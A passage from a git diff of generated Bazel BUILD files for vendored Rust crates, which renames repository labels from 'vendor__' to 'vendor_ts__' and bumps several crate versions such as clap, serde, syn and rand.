b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-query-1.1.2.bazel index 1256ede91579..2c8e86e0445e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-query-1.1.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-query-1.1.2.bazel @@ -82,13 +82,13 @@ rust_library( version = "1.1.2", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.7.bazel similarity index 88% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.6.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.7.bazel index 6490cd9011e8..b3491e3a0594 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.7.bazel @@ -79,18 +79,21 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "3.0.6", + version = "3.0.7", deps = [ - "@vendor__anstyle-1.0.10//:anstyle", + "@vendor_ts__anstyle-1.0.10//:anstyle", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__once_cell-1.20.3//:once_cell", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__once_cell-1.20.3//:once_cell", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__once_cell-1.20.3//:once_cell", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.95.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.96.bazel similarity index 97% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.95.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.96.bazel index 30ee807dacf3..25be98a2a2aa 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.95.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.96.bazel @@ -84,9 +84,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.95", + version = "1.0.96", deps = [ - "@vendor__anyhow-1.0.95//:build_script_build", + "@vendor_ts__anyhow-1.0.96//:build_script_build", ], ) @@ -139,7 +139,7 @@ cargo_build_script( "noclippy", "norustfmt", ], - version = "1.0.95", + version = "1.0.96", visibility = ["//visibility:private"], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.argfile-0.2.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.argfile-0.2.1.bazel index a7f09f81f519..b2fff86bc5d9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.argfile-0.2.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.argfile-0.2.1.bazel @@ -84,7 +84,7 @@ rust_library( }), version = "0.2.1", deps = [ - "@vendor__fs-err-2.11.0//:fs_err", - "@vendor__os_str_bytes-7.0.0//:os_str_bytes", + "@vendor_ts__fs-err-2.11.0//:fs_err", + "@vendor_ts__os_str_bytes-7.0.0//:os_str_bytes", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.atomic-0.6.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.atomic-0.6.0.bazel index ccbde7b37ad2..fb24bd230eef 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.atomic-0.6.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.atomic-0.6.0.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.6.0", deps = [ - "@vendor__bytemuck-1.21.0//:bytemuck", + "@vendor_ts__bytemuck-1.21.0//:bytemuck", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bazel index 952ad2432905..3632f78bd5f4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bazel @@ -32,619 +32,619 @@ filegroup( # Workspace Member Dependencies alias( - name = "anyhow-1.0.95", - actual = "@vendor__anyhow-1.0.95//:anyhow", + name = "anyhow-1.0.96", + actual = "@vendor_ts__anyhow-1.0.96//:anyhow", tags = ["manual"], ) alias( name = "anyhow", - actual = "@vendor__anyhow-1.0.95//:anyhow", + actual = "@vendor_ts__anyhow-1.0.96//:anyhow", tags = ["manual"], ) alias( name = "argfile-0.2.1", - actual = "@vendor__argfile-0.2.1//:argfile", + actual = "@vendor_ts__argfile-0.2.1//:argfile", tags = ["manual"], ) alias( name = "argfile", - actual = "@vendor__argfile-0.2.1//:argfile", + actual = "@vendor_ts__argfile-0.2.1//:argfile", tags = ["manual"], ) alias( name = "chrono-0.4.39", - actual = "@vendor__chrono-0.4.39//:chrono", + actual = "@vendor_ts__chrono-0.4.39//:chrono", tags = ["manual"], ) alias( name = "chrono", - actual = "@vendor__chrono-0.4.39//:chrono", + actual = "@vendor_ts__chrono-0.4.39//:chrono", tags = ["manual"], ) alias( - name = "clap-4.5.26", - actual = "@vendor__clap-4.5.26//:clap", + name = "clap-4.5.31", + actual = "@vendor_ts__clap-4.5.31//:clap", tags = ["manual"], ) alias( name = "clap", - actual = "@vendor__clap-4.5.26//:clap", + actual = "@vendor_ts__clap-4.5.31//:clap", tags = ["manual"], ) alias( name = "dunce-1.0.5", - actual = "@vendor__dunce-1.0.5//:dunce", + actual = "@vendor_ts__dunce-1.0.5//:dunce", tags = ["manual"], ) alias( name = "dunce", - actual = "@vendor__dunce-1.0.5//:dunce", + actual = "@vendor_ts__dunce-1.0.5//:dunce", tags = ["manual"], ) alias( - name = "either-1.13.0", - actual = "@vendor__either-1.13.0//:either", + name = "either-1.14.0", + actual = "@vendor_ts__either-1.14.0//:either", tags = ["manual"], ) alias( name = "either", - actual = "@vendor__either-1.13.0//:either", + actual = "@vendor_ts__either-1.14.0//:either", tags = ["manual"], ) alias( name = "encoding-0.2.33", - actual = "@vendor__encoding-0.2.33//:encoding", + actual = "@vendor_ts__encoding-0.2.33//:encoding", tags = ["manual"], ) alias( name = "encoding", - actual = "@vendor__encoding-0.2.33//:encoding", + actual = "@vendor_ts__encoding-0.2.33//:encoding", tags = ["manual"], ) alias( name = "figment-0.10.19", - actual = "@vendor__figment-0.10.19//:figment", + actual = "@vendor_ts__figment-0.10.19//:figment", tags = ["manual"], ) alias( name = "figment", - actual = "@vendor__figment-0.10.19//:figment", + actual = "@vendor_ts__figment-0.10.19//:figment", tags = ["manual"], ) alias( - name = "flate2-1.0.35", - actual = "@vendor__flate2-1.0.35//:flate2", + name = "flate2-1.1.0", + actual = "@vendor_ts__flate2-1.1.0//:flate2", tags = ["manual"], ) alias( name = "flate2", - actual = "@vendor__flate2-1.0.35//:flate2", + actual = "@vendor_ts__flate2-1.1.0//:flate2", tags = ["manual"], ) alias( name = "glob-0.3.2", - actual = "@vendor__glob-0.3.2//:glob", + actual = "@vendor_ts__glob-0.3.2//:glob", tags = ["manual"], ) alias( name = "glob", - actual = "@vendor__glob-0.3.2//:glob", + actual = "@vendor_ts__glob-0.3.2//:glob", tags = ["manual"], ) alias( name = "globset-0.4.15", - actual = "@vendor__globset-0.4.15//:globset", + actual = "@vendor_ts__globset-0.4.15//:globset", tags = ["manual"], ) alias( name = "globset", - actual = "@vendor__globset-0.4.15//:globset", + actual = "@vendor_ts__globset-0.4.15//:globset", tags = ["manual"], ) alias( name = "itertools-0.14.0", - actual = "@vendor__itertools-0.14.0//:itertools", + actual = "@vendor_ts__itertools-0.14.0//:itertools", tags = ["manual"], ) alias( name = "itertools", - actual = "@vendor__itertools-0.14.0//:itertools", + actual = "@vendor_ts__itertools-0.14.0//:itertools", tags = ["manual"], ) alias( name = "lazy_static-1.5.0", - actual = "@vendor__lazy_static-1.5.0//:lazy_static", + actual = "@vendor_ts__lazy_static-1.5.0//:lazy_static", tags = ["manual"], ) alias( name = "lazy_static", - actual = "@vendor__lazy_static-1.5.0//:lazy_static", + actual = "@vendor_ts__lazy_static-1.5.0//:lazy_static", tags = ["manual"], ) alias( name = "mustache-0.9.0", - actual = "@vendor__mustache-0.9.0//:mustache", + actual = "@vendor_ts__mustache-0.9.0//:mustache", tags = ["manual"], ) alias( name = "mustache", - actual = "@vendor__mustache-0.9.0//:mustache", + actual = "@vendor_ts__mustache-0.9.0//:mustache", tags = ["manual"], ) alias( name = "num-traits-0.2.19", - actual = "@vendor__num-traits-0.2.19//:num_traits", + actual = "@vendor_ts__num-traits-0.2.19//:num_traits", tags = ["manual"], ) alias( name = "num-traits", - actual = "@vendor__num-traits-0.2.19//:num_traits", + actual = "@vendor_ts__num-traits-0.2.19//:num_traits", tags = ["manual"], ) alias( name = "num_cpus-1.16.0", - actual = "@vendor__num_cpus-1.16.0//:num_cpus", + actual = "@vendor_ts__num_cpus-1.16.0//:num_cpus", tags = ["manual"], ) alias( name = "num_cpus", - actual = "@vendor__num_cpus-1.16.0//:num_cpus", + actual = "@vendor_ts__num_cpus-1.16.0//:num_cpus", tags = ["manual"], ) alias( name = "proc-macro2-1.0.93", - actual = "@vendor__proc-macro2-1.0.93//:proc_macro2", + actual = "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", tags = ["manual"], ) alias( name = "proc-macro2", - actual = "@vendor__proc-macro2-1.0.93//:proc_macro2", + actual = "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", tags = ["manual"], ) alias( name = "quote-1.0.38", - actual = "@vendor__quote-1.0.38//:quote", + actual = "@vendor_ts__quote-1.0.38//:quote", tags = ["manual"], ) alias( name = "quote", - actual = "@vendor__quote-1.0.38//:quote", + actual = "@vendor_ts__quote-1.0.38//:quote", tags = ["manual"], ) alias( - name = "ra_ap_base_db-0.0.258", - actual = "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", + name = "ra_ap_base_db-0.0.266", + actual = "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", tags = ["manual"], ) alias( name = "ra_ap_base_db", - actual = "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", + actual = "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", tags = ["manual"], ) alias( - name = "ra_ap_cfg-0.0.258", - actual = "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", + name = "ra_ap_cfg-0.0.266", + actual = "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", tags = ["manual"], ) alias( name = "ra_ap_cfg", - actual = "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", + actual = "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", tags = ["manual"], ) alias( - name = "ra_ap_hir-0.0.258", - actual = "@vendor__ra_ap_hir-0.0.258//:ra_ap_hir", + name = "ra_ap_hir-0.0.266", + actual = "@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir", tags = ["manual"], ) alias( name = "ra_ap_hir", - actual = "@vendor__ra_ap_hir-0.0.258//:ra_ap_hir", + actual = "@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir", tags = ["manual"], ) alias( - name = "ra_ap_hir_def-0.0.258", - actual = "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def", + name = "ra_ap_hir_def-0.0.266", + actual = "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def", tags = ["manual"], ) alias( name = "ra_ap_hir_def", - actual = "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def", + actual = "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def", tags = ["manual"], ) alias( - name = "ra_ap_hir_expand-0.0.258", - actual = "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", + name = "ra_ap_hir_expand-0.0.266", + actual = "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", tags = ["manual"], ) alias( name = "ra_ap_hir_expand", - actual = "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", + actual = "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", tags = ["manual"], ) alias( - name = "ra_ap_ide_db-0.0.258", - actual = "@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db", + name = "ra_ap_ide_db-0.0.266", + actual = "@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db", tags = ["manual"], ) alias( name = "ra_ap_ide_db", - actual = "@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db", + actual = "@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db", tags = ["manual"], ) alias( - name = "ra_ap_intern-0.0.258", - actual = "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", + name = "ra_ap_intern-0.0.266", + actual = "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", tags = ["manual"], ) alias( name = "ra_ap_intern", - actual = "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", + actual = "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", tags = ["manual"], ) alias( - name = "ra_ap_load-cargo-0.0.258", - actual = "@vendor__ra_ap_load-cargo-0.0.258//:ra_ap_load_cargo", + name = "ra_ap_load-cargo-0.0.266", + actual = "@vendor_ts__ra_ap_load-cargo-0.0.266//:ra_ap_load_cargo", tags = ["manual"], ) alias( name = "ra_ap_load-cargo", - actual = "@vendor__ra_ap_load-cargo-0.0.258//:ra_ap_load_cargo", + actual = "@vendor_ts__ra_ap_load-cargo-0.0.266//:ra_ap_load_cargo", tags = ["manual"], ) alias( - name = "ra_ap_parser-0.0.258", - actual = "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", + name = "ra_ap_parser-0.0.266", + actual = "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", tags = ["manual"], ) alias( name = "ra_ap_parser", - actual = "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", + actual = "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", tags = ["manual"], ) alias( - name = "ra_ap_paths-0.0.258", - actual = "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", + name = "ra_ap_paths-0.0.266", + actual = "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", tags = ["manual"], ) alias( name = "ra_ap_paths", - actual = "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", + actual = "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", tags = ["manual"], ) alias( - name = "ra_ap_project_model-0.0.258", - actual = "@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model", + name = "ra_ap_project_model-0.0.266", + actual = "@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model", tags = ["manual"], ) alias( name = "ra_ap_project_model", - actual = "@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model", + actual = "@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model", tags = ["manual"], ) alias( - name = "ra_ap_span-0.0.258", - actual = "@vendor__ra_ap_span-0.0.258//:ra_ap_span", + name = "ra_ap_span-0.0.266", + actual = "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", tags = ["manual"], ) alias( name = "ra_ap_span", - actual = "@vendor__ra_ap_span-0.0.258//:ra_ap_span", + actual = "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", tags = ["manual"], ) alias( - name = "ra_ap_stdx-0.0.258", - actual = "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", + name = "ra_ap_stdx-0.0.266", + actual = "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", tags = ["manual"], ) alias( - name = "stdx-0.0.258", - actual = "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", + name = "stdx-0.0.266", + actual = "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", tags = ["manual"], ) alias( name = "stdx", - actual = "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", + actual = "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", tags = ["manual"], ) alias( - name = "ra_ap_syntax-0.0.258", - actual = "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", + name = "ra_ap_syntax-0.0.266", + actual = "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", tags = ["manual"], ) alias( name = "ra_ap_syntax", - actual = "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", + actual = "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", tags = ["manual"], ) alias( - name = "ra_ap_vfs-0.0.258", - actual = "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", + name = "ra_ap_vfs-0.0.266", + actual = "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", tags = ["manual"], ) alias( name = "ra_ap_vfs", - actual = "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", + actual = "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", tags = ["manual"], ) alias( - name = "rand-0.8.5", - actual = "@vendor__rand-0.8.5//:rand", + name = "rand-0.9.0", + actual = "@vendor_ts__rand-0.9.0//:rand", tags = ["manual"], ) alias( name = "rand", - actual = "@vendor__rand-0.8.5//:rand", + actual = "@vendor_ts__rand-0.9.0//:rand", tags = ["manual"], ) alias( name = "rayon-1.10.0", - actual = "@vendor__rayon-1.10.0//:rayon", + actual = "@vendor_ts__rayon-1.10.0//:rayon", tags = ["manual"], ) alias( name = "rayon", - actual = "@vendor__rayon-1.10.0//:rayon", + actual = "@vendor_ts__rayon-1.10.0//:rayon", tags = ["manual"], ) alias( name = "regex-1.11.1", - actual = "@vendor__regex-1.11.1//:regex", + actual = "@vendor_ts__regex-1.11.1//:regex", tags = ["manual"], ) alias( name = "regex", - actual = "@vendor__regex-1.11.1//:regex", + actual = "@vendor_ts__regex-1.11.1//:regex", tags = ["manual"], ) alias( - name = "serde-1.0.217", - actual = "@vendor__serde-1.0.217//:serde", + name = "serde-1.0.218", + actual = "@vendor_ts__serde-1.0.218//:serde", tags = ["manual"], ) alias( name = "serde", - actual = "@vendor__serde-1.0.217//:serde", + actual = "@vendor_ts__serde-1.0.218//:serde", tags = ["manual"], ) alias( - name = "serde_json-1.0.135", - actual = "@vendor__serde_json-1.0.135//:serde_json", + name = "serde_json-1.0.139", + actual = "@vendor_ts__serde_json-1.0.139//:serde_json", tags = ["manual"], ) alias( name = "serde_json", - actual = "@vendor__serde_json-1.0.135//:serde_json", + actual = "@vendor_ts__serde_json-1.0.139//:serde_json", tags = ["manual"], ) alias( name = "serde_with-3.12.0", - actual = "@vendor__serde_with-3.12.0//:serde_with", + actual = "@vendor_ts__serde_with-3.12.0//:serde_with", tags = ["manual"], ) alias( name = "serde_with", - actual = "@vendor__serde_with-3.12.0//:serde_with", + actual = "@vendor_ts__serde_with-3.12.0//:serde_with", tags = ["manual"], ) alias( - name = "syn-2.0.96", - actual = "@vendor__syn-2.0.96//:syn", + name = "syn-2.0.98", + actual = "@vendor_ts__syn-2.0.98//:syn", tags = ["manual"], ) alias( name = "syn", - actual = "@vendor__syn-2.0.96//:syn", + actual = "@vendor_ts__syn-2.0.98//:syn", tags = ["manual"], ) alias( - name = "toml-0.8.19", - actual = "@vendor__toml-0.8.19//:toml", + name = "toml-0.8.20", + actual = "@vendor_ts__toml-0.8.20//:toml", tags = ["manual"], ) alias( name = "toml", - actual = "@vendor__toml-0.8.19//:toml", + actual = "@vendor_ts__toml-0.8.20//:toml", tags = ["manual"], ) alias( name = "tracing-0.1.41", - actual = "@vendor__tracing-0.1.41//:tracing", + actual = "@vendor_ts__tracing-0.1.41//:tracing", tags = ["manual"], ) alias( name = "tracing", - actual = "@vendor__tracing-0.1.41//:tracing", + actual = "@vendor_ts__tracing-0.1.41//:tracing", tags = ["manual"], ) alias( name = "tracing-flame-0.2.0", - actual = "@vendor__tracing-flame-0.2.0//:tracing_flame", + actual = "@vendor_ts__tracing-flame-0.2.0//:tracing_flame", tags = ["manual"], ) alias( name = "tracing-flame", - actual = "@vendor__tracing-flame-0.2.0//:tracing_flame", + actual = "@vendor_ts__tracing-flame-0.2.0//:tracing_flame", tags = ["manual"], ) alias( name = "tracing-subscriber-0.3.19", - actual = "@vendor__tracing-subscriber-0.3.19//:tracing_subscriber", + actual = "@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber", tags = ["manual"], ) alias( name = "tracing-subscriber", - actual = "@vendor__tracing-subscriber-0.3.19//:tracing_subscriber", + actual = "@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber", tags = ["manual"], ) alias( name = "tree-sitter-0.24.6", - actual = "@vendor__tree-sitter-0.24.6//:tree_sitter", + actual = "@vendor_ts__tree-sitter-0.24.6//:tree_sitter", tags = ["manual"], ) alias( name = "tree-sitter", - actual = "@vendor__tree-sitter-0.24.6//:tree_sitter", + actual = "@vendor_ts__tree-sitter-0.24.6//:tree_sitter", tags = ["manual"], ) alias( name = "tree-sitter-embedded-template-0.23.2", - actual = "@vendor__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template", + actual = "@vendor_ts__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template", tags = ["manual"], ) alias( name = "tree-sitter-embedded-template", - actual = "@vendor__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template", + actual = "@vendor_ts__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template", tags = ["manual"], ) alias( name = "tree-sitter-json-0.24.8", - actual = "@vendor__tree-sitter-json-0.24.8//:tree_sitter_json", + actual = "@vendor_ts__tree-sitter-json-0.24.8//:tree_sitter_json", tags = ["manual"], ) alias( name = "tree-sitter-json", - actual = "@vendor__tree-sitter-json-0.24.8//:tree_sitter_json", + actual = "@vendor_ts__tree-sitter-json-0.24.8//:tree_sitter_json", tags = ["manual"], ) alias( name = "tree-sitter-ql-0.23.1", - actual = "@vendor__tree-sitter-ql-0.23.1//:tree_sitter_ql", + actual = "@vendor_ts__tree-sitter-ql-0.23.1//:tree_sitter_ql", tags = ["manual"], ) alias( name = "tree-sitter-ql", - actual = "@vendor__tree-sitter-ql-0.23.1//:tree_sitter_ql", + actual = "@vendor_ts__tree-sitter-ql-0.23.1//:tree_sitter_ql", tags = ["manual"], ) alias( name = "tree-sitter-ruby-0.23.1", - actual = "@vendor__tree-sitter-ruby-0.23.1//:tree_sitter_ruby", + actual = "@vendor_ts__tree-sitter-ruby-0.23.1//:tree_sitter_ruby", tags = ["manual"], ) alias( name = "tree-sitter-ruby", - actual = "@vendor__tree-sitter-ruby-0.23.1//:tree_sitter_ruby", + actual = "@vendor_ts__tree-sitter-ruby-0.23.1//:tree_sitter_ruby", tags = ["manual"], ) alias( name = "triomphe-0.1.14", - actual = "@vendor__triomphe-0.1.14//:triomphe", + actual = "@vendor_ts__triomphe-0.1.14//:triomphe", tags = ["manual"], ) alias( name = "triomphe", - actual = "@vendor__triomphe-0.1.14//:triomphe", + actual = "@vendor_ts__triomphe-0.1.14//:triomphe", tags = ["manual"], ) alias( name = "ungrammar-1.16.1", - actual = "@vendor__ungrammar-1.16.1//:ungrammar", + actual = "@vendor_ts__ungrammar-1.16.1//:ungrammar", tags = ["manual"], ) alias( name = "ungrammar", - actual = "@vendor__ungrammar-1.16.1//:ungrammar", + actual = "@vendor_ts__ungrammar-1.16.1//:ungrammar", tags = ["manual"], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.7.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.8.0.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.7.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.8.0.bazel index 8cab6aa66048..eb58d610f971 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.7.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.8.0.bazel @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "2.7.0", + version = "2.8.0", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.borsh-1.5.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.borsh-1.5.3.bazel index f355f40e61eb..09e2ca4092d4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.borsh-1.5.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.borsh-1.5.3.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "1.5.3", deps = [ - "@vendor__borsh-1.5.3//:build_script_build", + "@vendor_ts__borsh-1.5.3//:build_script_build", ], ) @@ -134,7 +134,7 @@ cargo_build_script( version = "1.5.3", visibility = ["//visibility:private"], deps = [ - "@vendor__cfg_aliases-0.2.1//:cfg_aliases", + "@vendor_ts__cfg_aliases-0.2.1//:cfg_aliases", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bstr-1.11.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bstr-1.11.3.bazel index 40c109380a87..baeadd361ef5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bstr-1.11.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bstr-1.11.3.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "1.11.3", deps = [ - "@vendor__memchr-2.7.4//:memchr", + "@vendor_ts__memchr-2.7.4//:memchr", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.camino-1.1.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.camino-1.1.9.bazel index 1c5987a67610..55635691a8f4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.camino-1.1.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.camino-1.1.9.bazel @@ -86,8 +86,8 @@ rust_library( }), version = "1.1.9", deps = [ - "@vendor__camino-1.1.9//:build_script_build", - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__camino-1.1.9//:build_script_build", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo-platform-0.1.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo-platform-0.1.9.bazel index ebaa6fbc108a..3882206b4690 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo-platform-0.1.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo-platform-0.1.9.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.9", deps = [ - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo_metadata-0.18.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo_metadata-0.18.1.bazel index 3ce41e37c246..0cbaa4613c05 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo_metadata-0.18.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo_metadata-0.18.1.bazel @@ -84,11 +84,11 @@ rust_library( }), version = "0.18.1", deps = [ - "@vendor__camino-1.1.9//:camino", - "@vendor__cargo-platform-0.1.9//:cargo_platform", - "@vendor__semver-1.0.24//:semver", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_json-1.0.135//:serde_json", - "@vendor__thiserror-1.0.69//:thiserror", + "@vendor_ts__camino-1.1.9//:camino", + "@vendor_ts__cargo-platform-0.1.9//:cargo_platform", + "@vendor_ts__semver-1.0.24//:semver", + "@vendor_ts__serde-1.0.218//:serde", + 